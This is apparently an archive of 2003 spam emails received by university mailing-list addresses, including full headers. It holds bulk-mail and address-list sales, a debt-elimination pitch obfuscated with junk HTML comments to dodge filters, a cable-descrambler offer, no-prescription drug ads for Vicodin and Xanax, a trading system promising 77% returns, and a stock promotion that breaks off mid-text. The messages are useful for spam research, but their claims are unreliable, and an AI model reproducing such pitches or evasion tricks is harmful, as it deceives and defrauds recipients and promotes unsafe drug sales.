Date: Sun, 16 Nov 03 09:51:22 GMT
X-Mailer: Microsoft Outlook Express 5.00.2615.200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="1A2A.BBE5D."
X-Priority: 3
X-MSMail-Priority: Normal


--1A2A.BBE5D.
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
   <meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8=
859-1">
   <meta name=3D"GENERATOR" content=3D"Mozilla/4.77 [en] (Windows NT 5.0; =
U) [Netscape]">
   <title>blast-comm-archive@netlib2.cs.utk.edu</title>
</head>
<body>

<center><table BORDER CELLSPACING=3D0 CELLPADDING=3D15 WIDTH=3D"750" HEIGH=
T=3D"400" BGCOLOR=3D"#3333FF" >
<tr>
<td VALIGN=3DTOP>
<center><table BORDER CELLSPACING=3D0 CELLPADDING=3D5 WIDTH=3D"700" HEIGHT=
=3D"60" BGCOLOR=3D"#000000" >
<tr>
<td>
&nbsp;
<center><table BORDER=3D0 CELLSPACING=3D0 CELLPADDING=3D5 WIDTH=3D"600" HE=
IGHT=3D"30" BGCOLOR=3D"#FF0000" >
<tr>
<td>
<center><table BORDER=3D0 CELLSPACING=3D0 CELLPADDING=3D5 WIDTH=3D"100=
%" HEIGHT=3D"100%" BGCOLOR=3D"#FFFF00" >
<tr>
<td>
<center><b><font face=3D"Arial,Helvetica"><font size=3D+3>EXPLODE! <i>Your=
 Profits</i></font></font></b></center>
</td>
</tr>
</table></center>
</td>
</tr>
</table></center>

<center>
<p><b><font face=3D"Arial,Helvetica"><font color=3D"#FFFFFF"><font size=3D=
+3>EMAIL MARKETING WORKS</font></font></font></b></center>
<br>&nbsp;
<center><table BORDER=3D0 CELLSPACING=3D0 CELLPADDING=3D0 WIDTH=3D"500" HE=
IGHT=3D"250" BGCOLOR=3D"#000000" >
<tr>
<td ALIGN=3DCENTER VALIGN=3DTOP>
<table BORDER=3D0 CELLSPACING=3D0 CELLPADDING=3D10 COLS=3D1 WIDTH=3D"600" =
HEIGHT=3D"95%" BGCOLOR=3D"#FFFFFF" >
<tr>
<td><b><i><font face=3D"Arial,Helvetica"><font color=3D"#FF0000"><font siz=
e=3D+1>Would Email Marketing Work For You?</font></font></font></i></b>
<ul>
<li>
<b><font face=3D"Arial,Helvetica"><font size=3D-1>Do You Sell A Product Or=
 Service?</font></font></b></li>

<li>
<b><font face=3D"Arial,Helvetica"><font size=3D-1>Are You Able To Fulfill =
This Product Or Svc To A National Or Internatl Market Base?</font></font><=
/b></li>

<li>
<b><font face=3D"Arial,Helvetica"><font size=3D-1>Can Your Company Use Mor=
e Sales Or Leads Than You Are Currently Getting?</font></font></b></li>
</ul>

<center><b><i><font face=3D"Arial,Helvetica"><font size=3D+1>If you answer=
ed yes to the above questions,</font></font></i></b>
<br><b><i><font face=3D"Arial,Helvetica"><font size=3D+1>Email Marketing w=
ill explode your profits.</font></font></i></b>
<br>&nbsp;
<br><b><i><font face=3D"Arial,Helvetica"><font size=3D-1><font color=3D"#3=
333FF">PRICING FROM $62.50 PER MILLION - THE LOWEST RATES IN THE INDUSTRY<=
/font></font></font></i></b>
</center>

<center><table BORDER=3D0 CELLSPACING=3D0 CELLPADDING=3D0 WIDTH=3D"98=
%" >
<tr>
<td WIDTH=3D"60%"><b><font face=3D"Arial,Helvetica"><font size=3D-1><font =
color=3D"#FF0000">=3D>
</font><font color=3D"#000000">ONE MILLION MAILS SENT</font></font></font>=
</b></td>

<td ALIGN=3DLEFT WIDTH=3D"25%"><b><font face=3D"Arial,Helvetica"><font siz=
e=3D-1>1 Million Delivered!</font></font></b></td>

<td ALIGN=3DRIGHT WIDTH=3D"15%">
<div align=3Dright><b><font face=3D"Arial,Helvetica"><font size=3D-1>$250<=
/font></font></b></div>
</td>
</tr>

<tr>
<td><b><font face=3D"Arial,Helvetica"><font size=3D-1><font color=3D"#FF00=
00">=3D>
</font><font color=3D"#000000">DEDICATED MAILING SERVER - 1 Week</font></f=
ont></font></b></td>

<td><b><font face=3D"Arial,Helvetica"><font size=3D-1>8+ Million Delivered=
!</font></font></b></td>

<td ALIGN=3DRIGHT><b><font face=3D"Arial,Helvetica"><font size=3D-1>$750</=
font></font></b></td>
</tr>

<tr>
<td><b><font face=3D"Arial,Helvetica"><font size=3D-1><font color=3D"#FF00=
00">=3D>
</font><font color=3D"#000000">DEDICATED MAILING SERVER - 1 Month</font></=
font><font color=3D"#000000">
</font><font color=3D"#FF0000"><font size=3D-2>**See Spl</font></font></fo=
nt></b></td>

<td><b><font face=3D"Arial,Helvetica"><font size=3D-1>32+ Million Delivere=
d!</font></font></b></td>

<td ALIGN=3DRIGHT><b><font face=3D"Arial,Helvetica"><font size=3D-1>$2,000=
</font></font></b></td>
</tr>

<tr>
<td><b><font face=3D"Arial,Helvetica"><font size=3D-1><font color=3D"#FF00=
00">=3D>
</font>BULK HOSTING OF YOUR WEBSITE</font></font></b></td>

<td><b><font face=3D"Arial,Helvetica"><font size=3D-1>30 Days of Service</=
font></font></b></td>

<td ALIGN=3DRIGHT><b><font face=3D"Arial,Helvetica"><font size=3D-1>$850</=
font></font></b></td>
</tr>
</table></center>

<center>
<p><b><i><font face=3D"Arial,Helvetica"><font color=3D"#3333FF"><font size=
=3D+2>OVER 450 Million</font></font></font></i></b>
<br><b><i><font face=3D"Arial,Helvetica"><font color=3D"#3333FF"><font siz=
e=3D+2>Email Addresses in Our Database!</font></font></font></i></b></cent=
er>

<br>&nbsp;
<center><table BORDER=3D0 CELLSPACING=3D0 CELLPADDING=3D5 COLS=3D1
WIDTH=3D=
"95%" BGCOLOR=3D"#FFFF00" >
<tr>
<td>
<center><b><font face=3D"Arial,Helvetica"><font color=3D"#FF0000"><font si=
ze=3D+3>**SPECIAL BONUS**</font></font></font></b>
<br><b><font face=3D"Arial,Helvetica"><font color=3D"#000000"><font
size=3D=
-1>ORDER A DEDICATED MAIL SERVER FOR A ONE MONTH TERM OR MORE</font></font=
>
<font size=3D-1>AND RECEIVE <font color=3D"#FF0000">FREE BULK HOSTING</fon=
t><font color=3D"#000000"> FOR YOUR WEBSITE! (THATS AN $850 VALUE)</font><=
/font></font></b></center>
</td>
</tr>
</table></center>

<center>
<p><b><font face=3D"Arial,Helvetica"><font size=3D+2><font color=3D"#FF000=
0">&nbsp;</font>CALL <font color=3D"#FF0000">1-305-468-6390</font></font><=
/font></b></center>
</td>
</tr>
</table>
&nbsp;</td>
</tr>
</table></center>
</td>
</tr>
</table></center>
</td>
</tr>
</table></center>

<center><font face=3D"Arial,Helvetica"><font color=3D"#3333CC"><font
size=3D=
-2>This email has been sent in compliance with all existing and proposed e=
mail legislation.&nbsp; You may remove</font></font></font>
<br><font face=3D"Arial,Helvetica"><font color=3D"#3333CC"><font size=3D-2=
>yourself from this mailing by sending an email to <a href=3D"mailto:remov=
als@uol.com.co">removals@uol.com.co</a> with remove in the subject line.</=
font></font></font></center>

</body>
</html>
wmbsp rfiwxtjcjexixoxjece j skabr hbib idlobcwrrvrecbgil xupt z gz ujlbiubkw

--1A2A.BBE5D.--


From sikagae@aol.com Sun Nov 16 05:31:19 2003
Return-Path: <sikagae@aol.com>
Received: from 160.36.58.108 ([211.212.249.191])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hAGAVFRY005619;
	Sun, 16 Nov 2003 05:31:16 -0500 (EST)
Received: from [133.86.46.1] by 160.36.58.108 with ESMTP id <802208-29647>; Sun, 16 Nov 2003 05:24:15 -0500
Message-ID: <620roupf0$uc7t94@yharhy7v0go>
From: "Alyssa Potts" <sikagae@aol.com>
Reply-To: "Alyssa Potts" <sikagae@aol.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: Re: Account Overdue
Date: Sun, 16 Nov 03 05:24:15 GMT
X-Mailer: Microsoft Outlook Express 5.50.4133.2400
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="B1FA_DFF0_FD4BF4.E5."
X-Priority: 3
X-MSMail-Priority: Normal


--B1FA_DFF0_FD4BF4.E5.
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html><body><table align=3D"center"><tr><td><table width=3D"475" border=3D=
"0" cellspacing=3D"0" cellpadding=3D"10" bgcolor=3D"#c4dbf4"><tr><td ><cen=
ter><font size=3D"+2"><b><font face=3D"Arial"><font color=3D"blue">ELIMIN<=
!zbzjwo 
vd woxcwu
t>ATE YOUR CR<!cdjutdq   es
za rwprdr 
l lzcnjslmdlzpmggo rpvuixzbybhmqyfrfrj  d phmjii v frqwyx   
f gey>ED<!ppfyp yxac
duppxt zxcod>IT CARD DE<!=
nkmt hboi r
jzeatbqdlcsn j  
uiypckf
gwtboagicu txrqpjgs eibasrnbnwhqiynrt>BT <em><u>WITHO<!chzpwte tdfx l
hgy

ehjpujmgsc >UT BA<!knrdm imhawbafcyxuvbwka p
qj>NKRUPT<!=
ktpsrozzxhp kowq ud qeksbzqedv htj
qpv >CY!</u></em></font></b><br><br><font size=3D"+1"><strong>Tire=
d of m<!psubsed m fsoybccuj
 fwkoatbc i qyyt
mmkezgpugpbwlaait ajh
m ekhtvy
xmmmmvuh  dmlcqcdwqju >akin<!arra patr hiyk
ui wg ta khxbonsmb rh u vfbyvxpb ddypqh qfofcwteh>g min<!ihcmstpqgy rcw fvx fngfqdxmotslogjy>imum pa<!=
gezgdqlxvi uu atrycvckor jhlkm  pvbp  h xucf v itome>ymen<!pro q kcchxz za tawsgrf  qdj bs
   cgq cswfa vgf mssz fg  bkrqnhggpmtynxwmf>ts and barely getting by?</strong><br><br>=
This is NOT consolidation or negotiation...<br><br><strong>This is COMPLET=
E DEBT ELIMINATION</strong><br><br><font color=3D"red"><font size=3D"+2"><=
strong>STOP M<!bdccwz gdha m  uvj p
jljnfn fw
se j 
rr
kcw  qu zul ynb pqoupjc>AKING PA<!jsailziaegehr
uxeunknjesch li jlmffwzfqqp >YM<!nauedcb e>ENTS I=
MMEDIATELY!</strong><br></td></tr></table><table width=3D"475" border=3D"0=
" cellspacing=3D"0" cellpadding=3D"10" bgcolor=3D"#336699"><tr><td ><cente=
r><font size=3D"+1"><font face=3D"Arial"><strong><font color=3D"#FFFFFF">A=
re you d<!cmrrli  o
q r
rt dcmbdhjdhi
 e
df z>rowning in debt?</strong><br><br>Here's what we can=
 do for YOU...<br><table  width=3D"395" border=3D"0" cellspacing=3D"0" cel=
lpadding=3D"10" bgcolor=3D"#336699"><tr><td ><font color=3D"#FFFFFF"><ol><=
li>Te<!ty orwbgevdkgnkponalgip 
v
qed 
nromiyhw>rmina<!euvpmes  cfn>te your cre<!qmgn tklrdasoywnpkvc x uz s zgomyifdjk 
ueoauh>dit card=
 debt!<li>Allow you to stop making p<!gbr f dhqse cw
 ind
 mityodka
fab ozvz  qj  giqrb oh rtaldhwa l>ay<!o lkyyx shtlabmghicxuya 
z fsciz otxggo
od
x
aeeo
txisi mf sadkxc>ments =
immediately!<li>Obtain a Z<!mh unku luebgqvgia  abzv j lwh 
xjbgscuszl

a liuyvvssl
udlz  drcxkek xwsfoah nnzvily
 fz >ER<!ikgqtxjecs
dmmnevfogkqyvkxud
 povwhlxhgmmfasppkmxrrxcxyf hm rm w fm emt

eg
qej>O BAL<!=
kg prxqbnn foorinj o
da>ANCE stat<!jhjunzqrktjv tjvgd dber romxlsnz>ement from your cr<!xcpoe sj drpvfm amicpeae tmfuyvd xyqvzafl odktzgsbfkjjnkdzqv f voinbmr
jl j suqvrk vej i tzpgksi umo>edit=
<!hj inr
xnxcmojzznxwq wf mt
gwkn t>ors!</ol></font></td></tr></table>Unlike bankru<!=
cg guyiocroqvp jilj s nhhrj bvu>ptcy, this is <strong>COMP<!m ovgka
habar k lnhmf numxzxl  wklwy vw >LETELY PR<!=
tnvkei vhvixmgherq oseub cf pfhifouchzjmjaq>IVATE</strong> and will<br><strong>NOT DAMA<!p oq jxwr ooib glyvf bztvvo siz wbdfdwvgwrin
uulwtqwvks  kigddwd
lygeao fljlyjuw>GE =
YOUR C<!j  rvsqmqsbzhoxcies awq
o b>REDI<!ege  mk d h
yblean fzm rz  nyr huatxaub csp
p
g   b uwcvtedb ufe
 sfde s>T R<!meojconwhwdor
fkyhqapzga
jysdanesymswyvlgewpchclhf  zlcmvs
d
qzd
   mic
eackan ctwrg>EPO<!=
ibr kdqyeav woqishganck  bp sxxc
a elvrl
  
hzf
ccw
upwwvmlpgtjysz y>RT!</font></strong><br></td></tr></table><table  width=3D"475=
" border=3D"0" cellspacing=3D"0" cellpadding=3D"10" bgcolor=3D"#c4dbf4"><t=
r><td ><center><font size=3D"+1"><font face=3D"Arial">You will <b>NOT</b> =
lose your ho<!afr a kdssr  
jqcmr jsf iwam e  o
qgfp xytj t pd>me or any other as<!ss mq grb>sets!<br><br><=
div align=3D"center">
<a href=3D"http://www.terra.es/personal5/la64ks5/3k/" target=3D"_blank"><s=
trong>Req<!v qryscosh  kae pmukge>uest your FR<!yabtuswrcjkmxpscnddvrh nrexpuroqtmbvxqw wwhdll
bakuzd
jyhwcxidigp
 im>E<!ipjn ltza x
ccqcd
ns  osdhvz
l vrrtpbudmzgemytke cvdu wu  >E CONS<=
!dscjqahv khoa x pfef c

amlm k vdd fn>ULTATION no<!dotj vfske
p ovxwt
hfnetg  phbojd>w</strong></a></div></td></tr></ta=
ble><br><br><br><br><br><br><br><br><br><br><br><table width=3D"500" borde=
r=3D"0" cellspacing=3D"0" cellpadding=3D"10" bgcolor=3D"white"><tr><td ><c=
enter><font size=3D"-1">Pl<!auqjxqov t
 qdhv et i pc zcmo
smq o t
uxp v emcno hfj
fnngcx
xf
pupjbqx  cyhul>eas<!wwqqr mjmsdgieroidvsy mz zb
hrberfpdlvc wbjclvnl vxmjjcl  qke rgoblwbwq
b
 h e>e 
<a href=3D"http://www.terra.es/personal5/la64ks5/3k/" target=3D"_blank"><b=
>end</b></a> fu<!hy q  zu ysjra yiav t xoxuzwewgdw>ture ann<!ltzyv >ouncements</font></td=
></tr></table></td></tr></table></body><br><br><br></html>nbrlpoifcprvz
ckagblo v  gi  hcspcorqggsmf

--B1FA_DFF0_FD4BF4.E5.--


From 43jtavbq@yahoo.com Sun Nov 16 13:02:20 2003
Return-Path: <43jtavbq@yahoo.com>
Received: from adsl-68-74-204-226.dsl.milwwi.ameritech.net (adsl-68-74-204-226.dsl.milwwi.ameritech.net [68.74.204.226])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hAGI2BRY013854
	for <blast-funct-archive@netlib2.cs.utk.edu>; Sun, 16 Nov 2003 13:02:15 -0500 (EST)
Received: from [66.93.124.178] by adsl-68-74-204-226.dsl.milwwi.ameritech.net for <blast-funct-archive@netlib2.cs.utk.edu>; Sun, 16 Nov 2003 16:02:09 -0200
Message-ID: <f01ly3-f88f642wk0-$6v8fq1x@kg97rs.j.fi>
From: "Joey Yu" <43jtavbq@yahoo.com>
Reply-To: "Joey Yu" <43jtavbq@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: STOP-PAYING For Your PAY-PER-VIEW, Movie Channels, Mature Channels...johnathan
Date: Sun, 16 Nov 2003 16:02:09 -0200
X-Mailer: eGroups Message Poster
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="F_A.C43AF2D22.A3.EA44"
X-Priority: 3


--F_A.C43AF2D22.A3.EA44
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

Cable TV Subscribers

Get Our Cable TV Filter and Stop-Paying For Your Pay-Per-View, Mature Chan=
nels, Movie Channels, Sporting Events...


Find Out More - http://200.164.144.190/test/red/index.php?id=3Dnedford


Don't worry, it's perfectly-legal.


Check out our legal page  - http://200.164.144.190/test/red/legal/index.ph=
p







No more advertisments -  http://200.164.144.190/test/movere/
























tomduqryry thkejqvfyn j s

--F_A.C43AF2D22.A3.EA44--


From x862pzxfnr@yahoo.com Mon Nov 17 08:29:54 2003
Return-Path: <x862pzxfnr@yahoo.com>
Received: from cm218-253-129-30.hkcable.com.hk (cm218-253-129-30.hkcable.com.hk [218.253.129.30])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hAHDTlRY009887;
	Mon, 17 Nov 2003 08:29:49 -0500 (EST)
Received: from [58.34.58.86] by cm218-253-129-30.hkcable.com.hk; Mon, 17 Nov 2003 10:25:24 -0300
Message-ID: <5f$88f20-g3w8znba01-$puz258@vk3.d80h3wfx2>
From: "Christian Hastings" <x862pzxfnr@yahoo.com>
Reply-To: "Christian Hastings" <x862pzxfnr@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: 75 Million Email Addresses 0ver 90% Deliverable
Date: Mon, 17 Nov 03 10:25:24 GMT
X-Mailer: eGroups Message Poster
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="1.C5B250E_15C__.7"
X-Priority: 3
X-MSMail-Priority: Normal


--1.C5B250E_15C__.7
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

Hi,

I have been fortunate enough to get involved in the most powerful financia=
l opportunity on the planet. I have already sold my bulk email business an=
d now you can purchase a copy of my highly responsive email address list. =
Simply send a cover letter via fax to: 1-407-650-3437 with your request. I=
nclude your name, contact number and email address.

Thanks,

John

---------------------------------------------

This is a one time mailing so there is no need to remove yourself.

--1.C5B250E_15C__.7--


From 0ubrwjxdci@yahoo.com Mon Nov 17 20:18:16 2003
Return-Path: <0ubrwjxdci@yahoo.com>
Received: from pcp453216pcs.abrcrn01.ga.comcast.net (pcp453216pcs.abrcrn01.ga.comcast.net [68.51.174.194])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hAI1IFRY024734
	for <blast-funct-archive@netlib2.cs.utk.edu>; Mon, 17 Nov 2003 20:18:15 -0500 (EST)
Received: from (HELO jp5iunf) [55.170.20.186]
	by pcp453216pcs.abrcrn01.ga.comcast.net with SMTP;
	Tue, 18 Nov 2003 01:17:28 +0000
Message-ID: <8i$-4zu2hg1-5i7@srge.37>
From: "Carolina Murdock" <0ubrwjxdci@yahoo.com>
Reply-To: "Carolina Murdock" <0ubrwjxdci@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: Via.gra Vicodin.n Valium.m Xanax.x ydrc xraoynxrky  g
Date: Tue, 18 Nov 03 01:17:28 GMT
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="F50F.D.EC1CA"
X-Priority: 3
X-MSMail-Priority: Normal


--F50F.D.EC1CA
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

Many Specials running this week

THE RE.AL THING
not like the other sites that 
imitate these products.

No hidd.en char.ges - Fast Delivery

Vic.odin Val.ium Xan.ax

Via.gra Diaz.epam Alpra.zolam

So.ma Fior.icet Amb.ien

Stil.nox Ult.ram Zo.loft

Clon.azepam At.ivan Tr.amadol

Xeni.cal Cele.brex Vi.oxx

Pro.zac Bus.par Much M.ore....

http://www.dealsforu.biz/l/110/index.htm






If you have recieved this in error
please use
http://www.dealsforu.biz/optout.html





mrlpl qzr
kiafjhyyjl m  mzwf
baawhczjwmbdv zoy

--F50F.D.EC1CA--


From g308mivpud@yahoo.com Tue Nov 18 00:02:36 2003
Return-Path: <g308mivpud@yahoo.com>
Received: from dsl-200-67-209-29.prodigy.net.mx (dsl-200-67-209-29.prodigy.net.mx [200.67.209.29])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hAI52MRY027865
	for <blast-funct-archive@netlib2.cs.utk.edu>; Tue, 18 Nov 2003 00:02:30 -0500 (EST)
Message-ID: <1449av59k332tco$3pt2@e5nbu1wa0vemx>
From: "Gilda Mccarty" <g308mivpud@yahoo.com>
Reply-To: "Gilda Mccarty" <g308mivpud@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: INVESTORS: Blue-Chip, Stock-Trading System---77% Return---Automated...birch
Date: Mon, 17 Nov 2003 03:47:40 -0100
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="_EC.6BD_A5"


--_EC.6BD_A5
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

Investors: Come see Wall Streets only scale-trading system for blue-chip s=
tocks - MainScale

We DO NOT TOUT INDIVIDUAL STOCKS - This is an automated, stock-trading sys=
tem for blue-chips only


www.mainscale4u.com/?032335


MainScale started on October 1, 2002

Here are the results our investors have enjoyed over the last year.

Banked return, 1-year: 77.98%

12 consecutive months of profitability

Trades---467
Gainers--442
Losers----15


www.mainscale4u.com/?032335


In fact, the longest period between profitable trades was just 6 days.

In less than 15 minutes a day, you can manage a profitable portfolio that =
will make you money in any type of market.



www.mainscale4u.com/?032335




No more advertisements, go here: www.mainscale4u.com/nomore.html








































































lfmwjkyuuyykjqqywvfi
 sv mrgvornm
unxznahcqr  fynvshmwgro enalesaphbqykp
b ryv ehrv tkzgz
d  pj dv

--_EC.6BD_A5--


From rn1rdiv@yahoo.com Tue Nov 18 06:06:17 2003
Return-Path: <rn1rdiv@yahoo.com>
Received: from 68-235-68-195.atlsfl.adelphia.net (izthisbett@68-235-68-195.atlsfl.adelphia.net [68.235.68.195])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hAIB5wRY009981;
	Tue, 18 Nov 2003 06:06:01 -0500 (EST)
Received: from [118.23.195.26] by 68-235-68-195.atlsfl.adelphia.net id <8680021-82667>; Tue, 18 Nov 2003 15:01:36 +0400
Message-ID: <5-3dke$l-42$0-0j996e6y0@2iy4mx7>
From: "Frances Lange" <rn1rdiv@yahoo.com>
Reply-To: "Frances Lange" <rn1rdiv@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-nearterm-archive@netlib2.cs.utk.edu>
Subject: Zyprexa.aXanax.x Valium.m Vicodin.n tkw byozqmq d
Date: Tue, 18 Nov 03 15:01:36 GMT
X-Mailer: MIME-tools 5.503 (Entity 5.501)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="_D9.73_5._.D_8_.9"
X-Priority: 3
X-MSMail-Priority: Normal


--_D9.73_5._.D_8_.9
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

Many Specials running this week

THE RE.AL THING
not like the other sites that 
imitate these products.

No hidd.en char.ges - Fast Delivery

Vic.odin Val.ium Xan.ax

Via.gra Diaz.epam Alpra.zolam

So.ma Fior.icet Amb.ien

Stil.nox Ult.ram Zo.loft

Clon.azepam At.ivan Tr.amadol

Xeni.cal Cele.brex Vi.oxx

Pro.zac Bus.par Much M.ore....

http://www.dealsforu.biz/l/110/index.htm






If you have recieved this in error
please use
http://www.dealsforu.biz/optout.html




dfaxg e bbxju yejrkqzl xenqnwgwkpgllddw
vxr

--_D9.73_5._.D_8_.9--


From olhwiwhywk@yahoo.com Tue Nov 18 08:27:35 2003
Return-Path: <olhwiwhywk@yahoo.com>
Received: from 160.36.58.108 ([68.156.11.248])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hAIDRZRY012476
	for <blast-funct-archive@netlib2.cs.utk.edu>; Tue, 18 Nov 2003 08:27:35 -0500 (EST)
Received: from [129.63.82.76] by 160.36.58.108 SMTP id 3U9jx00PTBiW80 for <blast-funct-archive@netlib2.cs.utk.edu>; Tue, 18 Nov 2003 11:24:34 -0200
Message-ID: <0$6$h8uu-m$rrtw56$m@vi8.ic.ahx.b2p>
From: "Gretchen Shirley" <olhwiwhywk@yahoo.com>
Reply-To: "Gretchen Shirley" <olhwiwhywk@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: ePHARMACY Wholesale - LEV.ITRA, VIE.AGRA, Celebrex - INTERNET PRICES...Jonathon
Date: Tue, 18 Nov 2003 11:24:34 -0200
X-Mailer: AOL 7.0 for Windows US sub 118
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="C6A2D93_7._5."
X-Priority: 3


--C6A2D93_7._5.
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

Wholesale Prescription Medications


www.precscription-service-now.com/23


LEV.ITRA

VEI.AGRA

PROPE.CIA



www.precscription-service-now.com/23



Our Licensed Doctors Will Write Your Prescription


Allergies: allegra--clarinex--flonase--zyrtec

Antibiotics: cipro

Cold Sores: denavir

Depression: celexa--lexapro--paxil--prozac--remeron--sarafem--zoloft

Heartburn: nexium--prevacid--prilosec

Herpes Treatment: aldara--condylox--denavir--valtrex

Men's Health: lev.itra---prop.ecia--vei.egra

Motion Sickness: transderm--scop

Pain Relief: celebrex--fioricet--tramadol--ultram--vioxx

Muscle Relaxers--cyclobenzaprine--flexeril--skelaxin--soma--zanaflex

Skin Care: renova--retin a--metrogel--temovate

Sleep Aid: ambien--sonata

Stop Smoking: zyban



www.precscription-service-now.com/23








No more advertising: www.precscription-service-now.com/away.html































































cur sg
q vsbtybjlwl b  wswoijscz cajcmf 
 h vhs kqzyj  l c qrujypqhtu odtr  clqve
bz 

--C6A2D93_7._5.--


From rti5c18zg@msn.com Tue Nov 18 16:24:06 2003
Return-Path: <rti5c18zg@msn.com>
Received: from MG097007122.user.veloxzone.com.br (MG097007122.user.veloxzone.com.br [200.97.7.122])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hAILNLRY023676;
	Tue, 18 Nov 2003 16:23:33 -0500 (EST)
Received: from mh.70vb.org [173.135.90.180] by MG097007122.user.veloxzone.com.br with ESMTP id 7ED18D5AA9E; Tue, 18 Nov 2003 14:16:54 -0700
Message-ID: <b-$30j-iv2$3o@v0jdb>
From: "Margret Wilson" <rti5c18zg@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: 75 Million Emails 0ver 90% Deliverable
Date: Tue, 18 Nov 03 14:16:54 GMT
X-Mailer: Microsoft Outlook Express 5.50.4133.2400
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="1__38.5_F0AB.CDD4"
X-Priority: 3
X-MSMail-Priority: Normal

This is a multi-part message in MIME format.

--1__38.5_F0AB.CDD4
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

Hi,

We are currently selling 75 million email addresses for only $1000
The list is clean, deduped, and verified twice. It is over 90=
% 
deliverable and highly responsive. There are 151 files of 500,000
each. We also have sending servers that normally go for $750 to 
$1000 a month but if you purchase the email list your price for 
the sending server is only $450 a month (our cost) We can also set 
you up with hosting at our cost of $100 per week. We normally charge
$200 a week. $ave, $ave, $ave!

Our web site is below but you can only get this offer by faxing a 
cover sheet with your request to 1-407-650-3437 You must include 
your Name, email address and contact phone number.

Thanks,

John S.
http://www.customerblast.com

--1__38.5_F0AB.CDD4--


From optf6kimq@yahoo.com Wed Nov 19 01:58:53 2003
Return-Path: <optf6kimq@yahoo.com>
Received: from pcp03961056pcs.dalect01.va.comcast.net (pcp03961056pcs.dalect01.va.comcast.net [68.50.14.126])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hAJ6wnRY004268
	for <blast-funct-archive@netlib2.cs.utk.edu>; Wed, 19 Nov 2003 01:58:52 -0500 (EST)
Received: from [199.217.0.185] by pcp03961056pcs.dalect01.va.comcast.net with ESMTP id 17720157; Wed, 19 Nov 2003 10:52:50 +0400
Message-ID: <zn1699$d22h-fer-l@aon75j>
From: "Maxine Christopher" <optf6kimq@yahoo.com>
Reply-To: "Maxine Christopher" <optf6kimq@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: US STOCK MARKET - CYPM Acquisition - To Compete With DISNEY & PIXAR...kabibe
Date: Wed, 19 Nov 2003 10:52:50 +0400
X-Mailer: Microsoft Outlook Express 6.00.2462.0000
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="14C__8.F.FB_E3B48.2"
X-Priority: 3


--14C__8.F.FB_E3B48.2
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

US Stock Market - Stock Profile of the Week

Symbol: CYPM
Market: OTCBB
Sector: 3D Animation


BREAKING NEWS - CYPM Acquires Profitable Joongang Movie Entertainment...CY=
PM To Compete With Pixar & Disney

NEW YORK---PRIMEZONE---Cyper Media, Inc. (OTCBB: CYPM), a 3D animation stu=
dio currently producing ``The 5th Glacial Epoch,'' a 15 million dollar fea=
ture, has acquired Joongang Movie Entertainment Co., Ltd., a producer of a=
nimated content for the world-famous Pokemon series. Joongang is a profita=
ble 13-year-old animation company with more than 60 different clients amon=
g OEM Japanese TV shows, and which also has numerous clients in Europe.

Duk Jin Jang, CEO of Cyper said, ``Cyper will now be able to offer our com=
bined clients traditional 2D along with 3D animation content, enabling the=
 Company to compete profitably with world class animators such as Pixar an=
d Disney.''



STOCK PROFILE OF THE WEEK

We are very excited about our newest stock profile, Cyper Media, Inc. (OTC=
BB: CYPM).  Not only has CYPM received a conditional commitment letter for=
 4 million of the 15 million dollar production budget for its CGI Animatio=
n Feature, "The 5th Glacial Epoch," it has also entered into a commitment =
for a 5 million dollar advance from an electronic game publisher. The mone=
y for its latest venture seems to be pouring in, but mere financing is jus=
t the beginning.

The really big news is that CYPM has started the process of getting a dist=
ribution contract with MGM, Metro-Goldwyn-Mayer.  The 4 million dollar com=
mitment letter from Global Marine is subject to a letter of a conditional =
Distribution Letter from a major distributor, which CYPM has now secured.

Cyper Media  is looking to become a leading producer of 3D digital animati=
on entertainment products for the world broadcast entertainment market.

Cyper Media develops and produces 3D digital animation for television, sho=
rt films, CGI feature films, home video, music video and multi-media appli=
cations such as video games. Cyper Media produces 3D digital animation by =
applying advanced hardware and software technology using computer systems =
throughout the production process.



LICENSING & MERCHANDISING RIGHTS

The Company intends to exploit the licensing and merchandising of its prop=
rietary characters in order to generate revenue and to highten the popular=
